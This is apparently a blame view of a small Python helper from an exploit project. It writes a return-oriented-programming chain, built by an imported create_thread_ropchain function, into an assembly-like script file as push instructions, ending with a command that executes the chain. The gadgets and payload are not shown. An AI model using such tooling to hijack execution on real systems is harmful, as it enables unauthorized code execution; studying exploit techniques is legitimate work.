2020-03-06 19:51:36 +01:00
|
|
|
from tcp_ropchain import *
|
|
|
|
|
from PayloadAddress import *
|
2020-02-11 23:43:08 +01:00
|
|
|
|
|
|
|
|
CHAIN_END = "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
|
|
|
|
|
|
|
|
|
|
def write_rop_chain(rop_chain, path):
|
|
|
|
|
with open('rop_setup.s', 'r') as f:
|
|
|
|
|
setup = f.read()
|
|
|
|
|
with open(path, 'w') as f:
|
|
|
|
|
print(setup, file=f)
|
|
|
|
|
for command in rop_chain:
|
|
|
|
|
if isinstance(command, PayloadAddress):
|
|
|
|
|
print("pushVar. globalVar,mscScriptAddress", file=f)
|
|
|
|
|
elif isinstance(command, int):
|
|
|
|
|
print(f"pushInt. {hex(command)}", file=f)
|
|
|
|
|
else:
|
|
|
|
|
raise Exception(f"Found invalid type {type(command)} in rop_chain")
|
|
|
|
|
print(CHAIN_END, file=f)
|
|
|
|
|
|
|
|
|
|
def main():
|
2020-03-06 19:51:36 +01:00
|
|
|
rop_chain = create_thread_ropchain(PayloadAddress())
|
2020-02-11 23:43:08 +01:00
|
|
|
write_rop_chain(rop_chain, 'main.s')
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
|
main()
|
